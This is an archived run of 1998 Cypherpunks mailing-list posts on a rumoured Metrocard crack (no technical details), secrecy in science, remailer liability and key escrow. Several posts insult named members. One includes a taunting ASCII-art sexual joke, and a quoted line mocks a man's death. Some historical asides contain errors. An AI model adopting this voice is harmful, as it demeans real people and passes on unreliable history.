   |                                          John F. Kennedy           |
   |                                                                    |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Fri, 9 Jan 1998 12:15:09 +0800
To: cypherpunks@toad.com
Subject: Schneier's metrocard cracked
Message-ID: <sLT1ie13w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain



I heard on the radio that the security scheme used in New York City metrocards
(designed with much input frm Bruce Schneier) has been cracked and that the
"hackers" can now add fare to the cards.

Does anyone know any details?  What encryption did Schneier use?

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Fri, 9 Jan 1998 12:28:38 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: rant on the morality of confidentiality (fwd)
Message-ID: <199801090451.WAA06712@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Thu, 08 Jan 1998 19:05:21 -0800
> From: David Honig <honig@otc.net>
> Subject: Re: rant on the morality of confidentiality 

> chooses.  The universe owes you nothing.

That depends on your personal philosophy, or are you claiming to have found
"The Way"? (that's rhetorical, please don't respond since the consequencial
discussion leads nowhere that we aren't already)

> Your goals and alliances are yours to choose.

You got to choose your family and what country you were born in and how much
money you have? Cool, you should consider yourself truly blessed, in the
several 10's of thousands of years of humanity you are the first so gifted.

> Everyone picks what they are comfortable with, and it ain't your business
> what they decide.  No one is
> obligated to agree with you.  And  everyone is
> obligated to let you alone, unless you violate their
> right to be left alone.  But you know this.

No, everyone doesn't pick what they are comfortable with. Only somebody that
takes their station in life with its consimmitent spoils as a given would
say something this idiotic. Nobody is obliged to let you alone unless they
decide to of their own volition. It only takes one to make war (the old
saying is wrong) it takes two to make peace. And man being what he is wants
his own way even at the expense of somebody elses way. Such is the trials
and tribulations of social animals.

> On secrecy, Saint Chas. Darwin sat on evolution forever, until he reviewed
> a paper that was going to scoop him, you know.  

Oh god, somebody else who hasn't studied Darwin or Meyr.... I covered the
rebuttal to this commen folk tale in a reply to Timmy. Look for it...


    ____________________________________________________________________
   |                                                                    |
   |      Those who make peaceful revolution impossible will make       |
   |      violent revolution inevitable.                                |
   |                                                                    |
   |                                          John F. Kennedy           |
   |                                                                    |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Fri, 9 Jan 1998 13:09:17 +0800
To: cypherpunks@toad.com
Subject: Re: rant on the morality of confidentiality (fwd)
In-Reply-To: <199801090201.UAA06101@einstein.ssz.com>
Message-ID: <c1T1ie18w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain



Jim Choate <ravage@ssz.com> writes:
The Nuriweiller wrote:
> > if so, they are not SCIENTISTS. a key aspect of SCIENCE is publishing
> > results. science cannot advance without it. name me one scientist
> > who did not publish an important result, or is considered a good
> > scientists for doing so!
>
> I must agree here. If a technologist (ie one who studies science for
> profit, hence creating a technology) chooses not to publish their results
> that is fine. However, a scientist is one who studies nature and its
> interactions, profit is not and should not be a motive. Simplistic or not;
> in fact some things are better understood when simplified (ala the
> scientific principle). A scientist has an obligation to discuss and publish
> their results for other scientists (and even technologist) when they are
> reasonably sure their results will stand up to indipendant verification (a
> critical issue in science, not in technology however).
>
> Don't be confused by Timy's claim to be a scientist, he is a technologist at
> heart. Many of his views and beliefs are motivated by issues of control *not*
> curiosity.

That's a very interesting idea.

Consider Fischer Black, who passed away a couple of years ago. His most
important contribution to science was the basic Black-Sholes equation.
What were his direct economic rewards for having come up with it? Not much,
really. He was already a tenured full professor at MIT. However as the
result of his discovery he got hired away by Goldman Sachs as a VP, and
later became a full partner. He did quite a bit of work at GS; none of it
as spectacular as the Black-Scholes equation; almost none of it published
in the open literature. Can we say that the bulk of his $50 million was for
the research he did while at MIT and not at Goldman (and which benefited
everyone in the industry, not just Goldman)? Did Goldman bet that Black
would deliver results comparable in importance to the B-S equation, which
Goldman would keep proprietary? Did Goldman win this bet (meaning, we
wouldn't really know if they did)?

I know another guy whom I won't name because he's still alive. He too is a
tenured professor and has published numerous papers in refereed journals.
His results are used by many people in the financial industry to make money.
A few years ago he made an interesting discovery in statistics. Instead of
publishing it, he and his coauthor took it to some investors and showed them
how to make lots of money trading on these results. The investors then said,
basically: yes we signed a nondisclosure agreement, but now that we know
what this is about, we're going to use it and we won't pay you a penny and
you don't have the money to sue us. Which is precisely what happened; the
result is still not published, but is slowly circulating through the quant
investing community.

The same guy informed me later that he discovered a closed-form solution to
some very interesting problems 9related to Black-Scholes) which according to
the open literature either can't be done accurately at all, or require
incredible amounts of cpu time for monte carlo simulations. he doesn't
wish tio publish it (although it would make him quite a celebrity) and
now he's going crazy trying to figure out a way to sell it in such a way
that he can't get screwed again. How would crypto help if at all?

Oh and by the way I suspect that a few minor crypto ideas in my PhD thesis
were known to certain British cryptographers in the 30s but never published
in the open literature.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Blanc <blancw@cnw.com>
Date: Fri, 9 Jan 1998 15:07:38 +0800
To: cypherpunks@Algebra.COM
Subject: Re: rant on the morality of confidentiality (fwd)
Message-ID: <3.0.32.19980108230250.00698184@cnw.com>
MIME-Version: 1.0
Content-Type: text/plain



Dr.Dimitri Vulis KOTM wrote:

>The same guy informed me later that he discovered a closed-form solution to
>some very interesting problems 9related to Black-Scholes) which according to
>the open literature either can't be done accurately at all, or require
>incredible amounts of cpu time for monte carlo simulations. he doesn't
>wish tio publish it (although it would make him quite a celebrity) and
>now he's going crazy trying to figure out a way to sell it in such a way
>that he can't get screwed again. How would crypto help if at all?
...........................................................

I don't know about crypto, but I just attended a very informative financial
forum on protecting intellectual property, presented by two representatives
from Arthur Andersen and Preston Gates & Ellis, LLP.   I picked up a little
brochure which the attorney firm had available for attendees:

	We counsel and represent inventors, authors, publishers,
	visual artists, and musicians as they face a host of new and
	important issues.  Preston Gates attorneys negotiate the use
	of creative expression in the full range of media, from
	CD-Roms and on-line services to interactive television and
	video games.  We monitor and advise clients on developments
	in consumer protection, defamation, infringement, and other
	legal areas that affect their ability to develop and market
	creative properties.  {etc}

web site:  www.prestongates.com, email: infotech@prestongates.com


	
    ..
Blanc





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Rogaski <wendigo@ne-wendigo.jabberwock.org>
Date: Fri, 9 Jan 1998 12:21:47 +0800
To: bill.stewart@pobox.com
Subject: Re: [Humor] Kennedy's New Legislation
In-Reply-To: <3.0.5.32.19980108000200.0084fab0@popd.ix.netcom.com>
Message-ID: <199801090404.XAA18655@deathstar.jabberwock.org>
MIME-Version: 1.0
Content-Type: text



-----BEGIN PGP SIGNED MESSAGE-----

An entity claiming to be Bill Stewart wrote:
: 
: At 07:19 PM 1/5/98 EST, Dr.Dimitri Vulis KOTM wrote:
: >"Evolution in action."
: >Thank you, Michael Kennedy, for improving humanity's gene pool.
: 
: It's only evolution in action if it gets them before they've reproduced...
: 

Actually, natural selection in action ...

- -- 
[] Mark Rogaski                   "That which does not kill me
[] wendigo@pobox.com                 only makes me stranger."
[]
[]      finger wendigo@deathstar.jabberwock.org for PGP key
[] anti spambot: postmaster@localhost abuse@localhost uce@ftc.gov

-----BEGIN PGP SIGNATURE-----
Version: PGP for Personal Privacy 5.0
Charset: noconv

iQEVAwUBNLWhyXzbrFts6CmBAQH8LQf8D09nOXOktV6P0uCEPKmRc8zc4ho2aXHF
t/WhFtgVWIdKNtBqwEYjIy+nS+4Q5Pfj0ZqI2Lj6JVJOpX8B5AqbhiTna7etws4y
RhfNMWN1jfA1JHs5BdEnOI5YrkR6HFD9NwtgGIt5sirinuH9kQ5YucxeydOdBw8w
mbN1U614rhAaehnVXSQ9v68eTuTWvdeJ+nuLRYblr5JNGsyPvlj3Fb8fQ+9kSod8
o2NCVCkOi3IQzAQWWbyBDS8RWsq77ZR15MRZAN/U5gn5s0Fz8R5Ym3wayEV6CYLv
nZ7rtoEEXyM6yjubvVZJB6jYtsE5TJVegO+k0vlocV6jKYsLFxsFtg==
=2T8G
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Brian B. Riley" <brianbr@together.net>
Date: Fri, 9 Jan 1998 12:36:18 +0800
To: "Robert A. Costner" <dm0@avana.net>
Subject: Re: Question on U.S. Postal Service and crypto
Message-ID: <199801090428.XAA02677@mx02.together.net>
MIME-Version: 1.0
Content-Type: text/plain



On 1/8/98 3:26 PM, Robert A. Costner (pooh@efga.org)  passed this wisdom:

>At 10:45 AM 1/8/98 -0800, David Miller wrote:
>>> An interesting feature of the digital postmark is that the USPS was making
>>> the claim that if you receive an email that the USPS send to you that was
>>> not meant for you, then you have committed a federal crime when you read
>it.
>>
>>I'm not so sure about this, Robert.  I've heard the rumor that it is a crime,
>>but I have also heard that if something is delivered to your box, it is yours
>>and you are not required to send it back unopened if it is not addressed to
>>you.  I tend to believe the latter, as it is the side of the story shared by
>>USPS employees.
>
>I wasn't commenting on the legality, but on the fact that the USPS web page
>was making the claim that it was a crime.  Apparently whoever wrote the
>legal disclaimer felt that email could be misdelivered in the same fashion
>in which postal mail could be misdelivered and was making this claim.  I
>found the claim to be nutty and made me think they didn't know what they
>were doing.

 Maybe they are confusing an electronic mailbox with a snailmail box ... 
the USPS has always contended that they (the USPS) "own" your mailbox and 
use that criterion to prosecute people who drive around putting things 
like circulars etc in mailboxes. Maybe they we on a role thinking that if 
they got into the e-mail business they would 'own' that piece of your 
hard drive so to speak.


Brian B. Riley --> http://members.macconnect.com/~brianbr
 For PGP Keys  <mailto:brianbr@together.net?subject=Get%20PGP%20Key>

The Windows PC Versus Macintosh Buying Decision:	
  "If you want to encourage your kids to color outside the lines, think 
  creatively and zig when the other kids zag, get the Mac. On the other 
  hand, if you want to teach your kid that life if full of frustration 
and 
  that anything worth getting takes plenty of patience and hard work, a 
  Windows machine should do quite nicely."
     - David Plotnikoff in the San Jose Mercury News 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Information Security <guy@panix.com>
Date: Fri, 9 Jan 1998 13:02:03 +0800
To: cypherpunks@toad.com
Subject: Re:  Schneier's metrocard cracked
Message-ID: <199801090440.XAA09818@panix2.panix.com>
MIME-Version: 1.0
Content-Type: text/plain



   Dr. Dim wrote:
   >   
   >   I heard on the radio that the security scheme used in New York City metrocards
   >   (designed with much input frm Bruce Schneier) has been cracked and that the
   >   "hackers" can now add fare to the cards.
   >   
   >   Does anyone know any details?  What encryption did Schneier use?

It sounds like a procedural thing.

Something like there was a way to swipe cards and have the
system wrongly think it updated the card.

The city announced that every cardreader in the system
is going to be recalibrated, and this will cause problems
for "a few" existing cardholders.

---guy





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Fri, 9 Jan 1998 12:55:20 +0800
To: nobody@replay.com (Anonymous)
Subject: Re: Remailers & N.E.T.
In-Reply-To: <v03007806b0db101f982c@[168.161.105.216]>
Message-ID: <v03007801b0db5ae481c8@[204.254.20.36]>
MIME-Version: 1.0
Content-Type: text/plain



Sure. That provision of the CDA was not meant to apply to remailer
operators but online services, which cut a deal on that bill. Prosecutors
would point, I suspect, to legislative intent and say remailer operators
aren't covered; they'd say the text of the law is not unambiguous.

It is not an impenetrable shield against time in Club Fed.

-Declan


At 03:51 +0100 1/9/98, Anonymous wrote:
>On Thu, 8 Jan 1998, Declan McCullagh wrote:
>
>> I would be very afraid of relying on the CDA's immunizing provisions as my
>> sole defense against prosecution, conviction, and jail time, were I a
>> remailer operator.
>Could you clarify what you mean by that?







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Fri, 9 Jan 1998 13:28:20 +0800
To: cypherpunks@toad.com
Subject: Re: [Humor] Kennedy's New Legislation
In-Reply-To: <199801090404.XAA18655@deathstar.jabberwock.org>
Message-ID: <aBw1ie20w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain



Mark Rogaski <wendigo@ne-wendigo.jabberwock.org> writes:

> An entity claiming to be Bill Stewart wrote:
> :
> : At 07:19 PM 1/5/98 EST, Dr.Dimitri Vulis KOTM wrote:
> : >"Evolution in action."
> : >Thank you, Michael Kennedy, for improving humanity's gene pool.
> :
> : It's only evolution in action if it gets them before they've reproduced...
> :
>
> Actually, natural selection in action ...

Same thing...

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Fri, 9 Jan 1998 14:20:09 +0800
To: cypherpunks@toad.com
Subject: Re: rant on the morality of confidentiality (fwd)
In-Reply-To: <199801090442.WAA06633@einstein.ssz.com>
Message-ID: <eew1ie21w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain



Jim Choate <ravage@ssz.com> writes:
> > From: Tim May <tcmay@got.net>
>
> > "Name me one..."? How about Gauss, who didn't publish many of his results.
> > Or, of course, Fermat, ironically linked to Wiles.
>
> True, Gauss didn't publish many of his results and he wasn't famed for that
> either. He *was* famed because he *did* publish some of his works. In fact,
> if you study Gauss you find a insecure introvert who in general hated his
> competition. He lied in his correspondance about work he supposedly did (see
> his relations with Bolyai who was a friend of his from school -
> "Non-euclidean Geometry" by Roberto Bonola; Dover ISBN 0-486-60027-0 $5.50).
> Yes, Gauss was respected for his math, he was hated for his humanity, or
> lack thereof. If anything Gauss' bahaviour held back science because of his
> self-interest.

Janos Bolyai was the son of the math professor Farkas B. in Buda(best).
While an undergraduate, he was working with a fellow named Szasz on
non-euclidean geometry. In 1832 he published his findings as an appendix
to his father's textbook. he did show that Euclid's axiom about parallel
lines is independent of the others and did explore the geometry that
arises if you omit this axiom. According to my sources, the appendix
is "Wronski-like" to the point of unreadability. Apparently no one
actually read it until B. started arguing about who did what first.

The Russian mathematician Lobachavsky, in Kazan, came up with very
similar results at the same time. He announced them at a talk in 1826
and published them in 1829. he was clearly first. There's no evidence
that B. knew of L.'s results; these ideas were coming naturally from
the work of the other mathematicians at this time.

In 1837 B. submitted a paper on quaternions to some sort of competition;
it received a very nagative review, which caused him to go crazy.
He started working on logical foundations of geometry in weird ways,
setting himself goals that he couldn't achieve. Then in 1940 he came
across a German translation of Lobachevsky's paper on non-eucldiean
geometry. he went totally bonkers, claiming that a) Lobachevsky is
not a real person, but a "tentacle" of Gauss; b) that gauss is out
to nail him, b) that their result is wrong anyway (although he never
explained how). He died relatively young and totally insane.

As someone pointed out, much of gauss's writings were not published until
after his death. The folsk researching his notes were shocked to discover
that Gauss did actually come up with very similar non-euclidean geometry
ideas as early as 1818 (not surprisingly - these ideas were literally
floating in the air). However he chose not to publish them, not realizing
how important they would be, and also fearing that they woudn't be
well accepted by his peers. Neither Bolyai nor Lobachevsky knew about
Gauss's work.

I have no idea what Bonola wrote, but if he's just repeating the allegations
Bolyai made about Gauss while suffering from depression and paranoia, they
have no more truth in them than the Timmy May rants on this mailing list.

By the way, the same gossip prompted the Tom Lehrer song about Lobachevsky.
I also don't see how Bolyai could have been gauss's chool friend, being
25 years younger than K.F.

And it's not a dichotomy; it's a trichotomy: one can
* do research and publish the results in a refereed journal. This is of
use only for tenue-track faculty who need to publish to get tenured. Many
refereed journals are extrmely political, with "friends" being published
ahead of the queue, and "strangers" kept waiting for a couple of years
while the "friends" can be advised of the manuscripts and publish their
own version of the results.
* do research on some practical problems whose solution interests some
wealthy folks. Most tenured faculty dream of doing that; many actually do.
* do research for fun/as a hobby; some wealthy folks do that, or pay
others to do that.

> Fermat in general published most of his work, however, much of it was lost
> including his proof. His statement was that it was too long to be written in
> the margin of the book, not that he didn't write it down. The implication
> being that he *had* written it down and it got misplaced or lost it.

Fermat was a judge. He did math for fun. (Strictly speaking, he did a lot
his mathematical research to facilitate his gambling hobby - at the time
when securities investment was viewed as a form of gambling no different
from cards, dice, horse races, dog fights/races, cock fights, etc.

How is Timmy's bet that INTC will fall (and shorting it, if he's got any
brains) different from some Jose's bet that the rooster named Pedro will
rip out the guts of the rooster named Jorge? I've known sports gamblers
who would bet tens of thusands of dollars on a single game, and they also
invested in securities; and the research they did before betting $40K on
a basketball game was comparable to the research before taking a similar
risk on stocks or bonds.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Blanc <blancw@cnw.com>
Date: Fri, 9 Jan 1998 17:56:18 +0800
To: cypherpunks@ssz.com
Subject: Re: rant on the morality of confidentiality (fwd)
Message-ID: <3.0.32.19980109000033.0070a820@cnw.com>
MIME-Version: 1.0
Content-Type: text/plain



Jim Choate wrote, regarding Newton:

>He certainly went to great pains to publish it, even anonymously in some
>cases and out of his own pocket.
...............................................................

Okay, just this one reply on this subject, Jim.  Taken from "The World of
Mathematics", and article entitled "Newton, the Man", by John Maynard Keynes:

" His deepest instincts were occult, esoteric, semantic - with profound
shrinking from the world, a paralyzing fear of exposing his thoughts, his
beliefs, his discoveries in all nakedness to the inspection and criticism
of the world.  'Of the most fearful, cautious and suspicious temper that I
ever knew', said Whiston, his successor in the Lucasian Chair.  The too
well-known conflicts and ignoble quarrels with Hooke, Flamsteed, Leibnitz
are only too clear an evidence of this.  Like all his type he was wholly
aloof from women.  He parted with and published nothing except under the
extreme pressure of friends.  Until the second phase of his life, he was a
wrapt, consecrated solitary, pursuing his studies by intenese introspection
with a mental endurance perhaps never equalled.
[...]
There is the story of how he informed Halley of one of his most fundamental
discoveries of planetary motion.  'Yes', replied Halley, 'but how do you
know that?  Have you proved it?'  Newton was taken aback - 'Why, I've known
it for years', he replied.  'If you'll give me a few days, I'll certainly
find you a proof of it' - as in due course he did."

    ..
Blanc





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@cypherpunks.to>
Date: Fri, 9 Jan 1998 08:28:43 +0800
To: Bill Frantz <frantz@netcom.com>
Subject: Re: Silly Shrinkwrapped Encryption
In-Reply-To: <v03110710b0d9f850d94d@[207.94.249.133]>
Message-ID: <Pine.BSF.3.96.980109002034.6936B-100000@pakastelohi.cypherpunks.to>
MIME-Version: 1.0
Content-Type: text/plain



On Wed, 7 Jan 1998, Bill Frantz wrote:

> I don't plan on using it, but the Swedes have a bit of an installed base
> problem.

Lotus made not secret of their GAK implementation in Notes. If the Swedish
government bought Notes anyway, they have only themselves and the
incompetence of their IS people to blame.

Now they have to scrap a recently fielded system. Though luck. Better
solutions than Notes were out there and easily to be found by the most
casual buyer.

-- Lucky Green <shamrock@cypherpunks.to> PGP v5 encrypted email preferred.
   "Tonga? Where the hell is Tonga? They have Cypherpunks there?"





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Crisavec <dbrown@alaska.net>
Date: Fri, 9 Jan 1998 17:48:28 +0800
To: cypherpunks@Algebra.COM
Subject: Re: cypherpunks and guns
Message-ID: <3.0.5.32.19980109002532.0084c330@alaska.net>
MIME-Version: 1.0
Content-Type: text/plain



William H. Geiger III typethed the following...
>
>-----BEGIN PGP SIGNED MESSAGE-----
>
>In <19980107001651.29456@songbird.com>, on 01/07/98 
>   at 03:16 AM, Kent Crispin <kent@songbird.com> said:
>
>>On Wed, Jan 07, 1998 at 01:25:45AM -0600, snow wrote:
>>> > I am fairly certain that as an irregular army soldier I could inflict
>>> > a substantial amount of damage upon an occupying military.  With maybe
>>> > $20k in equipment and several hundred hours of training, you could make
>>> 
>>> 	If you were smart, you could do it for a lot less. 
>
>>That presumes the enemy is dumb.  An amusing fantasy.
>
>The fact that they collect a paycheck from the government is prima facie
>evidence of diminished mental capacity.

Don't bet on....


There is only one war, and it's not between the whites and the
blacks, Labour and the Conservatives, Democrats and Republicans, or
the Federation and the Romulans, it's between those of us who aren't
complete idiots and those of us who are.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Fri, 9 Jan 1998 14:03:44 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: rant on the morality of confidentiality (fwd)
Message-ID: <199801090626.AAA07213@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Thu, 8 Jan 1998 20:41:47 -0800
> From: Tim May <tcmay@got.net>
> Subject: Re: rant on the morality of confidentiality (fwd)

> Add Choate to the list of dimbulbs who think calling me "Timmy" (or Timy)
> is some kind of witty insult. On this list, Detweiler and Vulis seem to
> favor this usage.

We're awful testy tonite aren't we...believe me junior, if I want to jump in
your shit I'll do it direct first person and in your face. Since it seems to
have got stuck in your craw, I apologize for not asking you the correct
usage of your name prior to typing it into my reply. In the future I
think I'll use 'that crazy indipendently wealthy ex-Intel technologist
and self-important testy gun nut that lives in California who almost got to
see John Denvers plane crash'; is *that* ok with you?

(not really, I think my fingers would cramp)

> Jeez, and I don't even recall insulting Choate. Perhaps he got his nose out
> of joint when I challenged his "all snipers use .223" piece of
> misinformation.

Unfortunately, for you, I never made that claim (if anything you did
regarding some comments I made about some police snipers liking .308's) and
therefore you didn't get to refute it. Whatever strategy you're on regarding
drugs and alcohol, reverse it; the dementia are back.

> Back in my killfile he goes. Incredible that he is even connected with one
> of the Cypherpunks distribution points.

Been there before, I won't loose any sleep that is for shure.

> BTW, nowhere in my piece did I refer to myself as a "scientist." I spoke of
> Wiles, and then of Gauss, Fermat, and Darwin.

Certainly not directly, but considering your background and past comments it
is an assumption that is justified. You most certainly feel qualified to
discuss the distinctions and consequences thereof.

Me, I consider myself a scientist and have since I was about 6 years old.



    ____________________________________________________________________
   |                                                                    |
   |      Those who make peaceful revolution impossible will make       |
   |      violent revolution inevitable.                                |
   |                                                                    |
   |                                          John F. Kennedy           |
   |                                                                    |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|

 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Costner" <pooh@efga.org>
Date: Fri, 9 Jan 1998 13:47:37 +0800
To: Declan McCullagh <declan@well.com>
Subject: Re: Remailers & N.E.T.
In-Reply-To: <199801090251.DAA10017@basement.replay.com>
Message-ID: <3.0.3.32.19980109004125.006a98ec@mail.atl.bellsouth.net>
MIME-Version: 1.0
Content-Type: text/plain



At 11:42 PM 1/8/98 -0500, Declan McCullagh wrote:
>Sure. That provision of the CDA was not meant to apply to remailer
>operators but online services, which cut a deal on that bill. Prosecutors
>would point, I suspect, to legislative intent and say remailer operators
>aren't covered; they'd say the text of the law is not unambiguous.

I think it would be pretty hard to distinguish the Cracker Remailer from an
Internet presence provider.  If hotmail or tripod were to be covered under
the CDA, then I would have to think Cracker would be as well.

EFGA/Cracker offers accounts, has dedicated servers, and has no editorial
control over content. At around 20,000 individual messages per week, I'd
have to say we are as good of a small online service as anyone else - even
if we only offer specialized services.  Many ISPs only have 100 or so users
and only about 1/6 of the connectivity of Cracker.


  -- Robert Costner                  Phone: (770) 512-8746
     Electronic Frontiers Georgia    mailto:pooh@efga.org  
     http://www.efga.org/            run PGP 5.0 for my public key





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Fri, 9 Jan 1998 14:19:37 +0800
To: cypherpunks@toad.com
Subject: Re: rant on the morality of confidentiality (fwd)
In-Reply-To: <v03102801b0db59b6282a@[207.167.93.63]>
Message-ID: <w1y1ie22w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain



Timmy May <tcmay@got.net> demonstrated his ignorance and stupidity by writing:

>
> At 6:01 PM -0800 1/8/98, Jim Choate wrote:
>
> >Don't be confused by Timy's claim to be a scientist, he is a technologist at
> >heart. Many of his views and beliefs are motivated by issues of control *not
> >curiosity.
> ....
> >You don't know Timmy very well do you...
>
> Add Choate to the list of dimbulbs who think calling me "Timmy" (or Timy)
> is some kind of witty insult. On this list, Detweiler and Vulis seem to
> favor this usage.

I like to call Timmy "Timmy" necause it's fun to watch Timmy twitch.

> Next he'll be putting out ASCII art

     +-----#--+
     |  O #   |          Which one is Guy Polis
     |  |#__O |          and which one is Timmy May?
     |._#_> \ |
     +-#------+
     Stop AIDS!

> Back in my killfile he goes. Incredible that he is even connected with one
> of the Cypherpunks distribution points.

When Timmy claims to killfile someone, it really means that he's paying a
special obsessive-compulsive attention to anything that person writes.

Here, Timmy, Timmy, Timmy!

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Fri, 9 Jan 1998 14:29:49 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Darwin's preface (a short history of evolution) [fwd]
Message-ID: <199801090653.AAA07502@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Hi,

Below is the 3rd preface to Darwin's 'Species', in it he clearly gives
credit to Wallace as a co-discover of evolutionary theory. Even to the point
of co-presenting the work to the Linnean Society on July 1, 1858. 

Oh, Erazmus Darwin was Charles' grandfather not uncle. Sorry for any
confusion.


    ____________________________________________________________________
   |                                                                    |
   |      Those who make peaceful revolution impossible will make       |
   |      violent revolution inevitable.                                |
   |                                                                    |
   |                                          John F. Kennedy           |
   |                                                                    |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|



Forwarded message:

> Date: Fri, 9 Jan 1998 00:46:47 -0600
> X-within-URL: http://www.talkorigins.org/faqs/origin/preface.html

>    The Origin of Species
>    Preface to the Third Edition
>    by Charles Darwin
>    
>    I will here give a brief sketch of the progress of opinion on the
>    Origin of Species. Until recently the great majority of naturalists
>    believed that species were immutable productions, and had been
>    separately created. This view has been ably maintained by many
>    authors. Some few naturalists, on the other hand, have believed that
>    species undergo modification, and that the existing forms of life are
>    the descendants by true generation of pre-existing forms. Passing over
>    allusions to the subject in the classical writers,(1) the first author
>    who in modern times has treated it in a scientific spirit was Buffon.
>    But as his opinions fluctuated greatly at different periods, and as he
>    does not enter on the causes or means of the transformation of
>    species, I need not here enter on details.
>    
>    Lamarck was the first man whose conclusions on the subject excited
>    much attention. This justly-celebrated naturalist first published his
>    views in 1801; he much enlarged them in 1809 in his "Philosophie
>    Zoologique,' and subsequently, in 1815, in the Introduction to his
>    "Hist. Nat. des Animaux sans Vertbres.' In these works he upholds the
>    doctrine that species, including man, are descended from other
>    species. He first did the eminent service of arousing attention to the
>    probability of all change in the organic, as well as in the inorganic
>    world, being the result of law, and not of miraculous interposition.
>    Lamarck seems to have been chiefly led to his conclusion on the
>    gradual change of species, by the difficulty of distinguishing species
>    and varieties, by the almost perfect gradation of forms in certain
>    groups, and by the analogy of domestic productions. With respect to
>    the means of modification, he attributed something to the direct
>    action of the physical conditions of life, something to the crossing
>    of already existing forms, and much to use and disuse, that is, to the
>    effects of habit. To this latter agency he seemed to attribute all the
>    beautiful adaptations in nature; -- such as the long neck of the
>    giraffe for browsing on the branches of trees. But he likewise
>    believed in a law of progressive development; and as all the forms of
>    life thus tend to progress, in order to account for the existence at
>    the present day of simple productions, he maintains that such forms
>    are now spontaneously generated.(2)
>    
>    Geoffroy Saint-Hilaire, as is stated in his 'Life,' written by his
>    son, suspected, as early as 1795, that what we call species are
>    various degenerations of the same type. It was not until 1828 that he
>    published his conviction that the same forms have not been perpetuated
>    since the origin of all things. Geoffroy seems to have relied chiefly
>    on the conditions of life, or the 'monde ambiant' as the cause of
>    change. He was cautious in drawing conclusions, and did not believe
>    that existing species are now undergoing modification; and, as his son
>    adds, "C'est donc un problme  rserver entirement  l'avenir,
>    suppos meme que l'avenir doive avoir prise sur lui.'
>    
>    In 1813, Dr W. C. Wells read before the Royal Society 'An Account of a
>    White female, part of whose skin resembled that of a Negro'; but his
